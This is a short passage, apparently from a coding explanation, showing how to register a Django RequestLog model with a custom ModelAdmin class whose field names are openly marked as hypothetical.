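admin.site.register also accepts a ModelAdmin subclass when the default change list is not enough. A hedged sketch — the field names are assumptions, not read from the actual models, and this would replace the plain register(RequestLog) call above:

from django.contrib import admin
from .models import RequestLog

class RequestLogAdmin(admin.ModelAdmin):
    # "created" and "status_code" are hypothetical field names; swap in
    # fields that actually exist on RequestLog.
    list_display = ("created", "status_code")
    list_filter = ("status_code",)

admin.site.register(RequestLog, RequestLogAdmin)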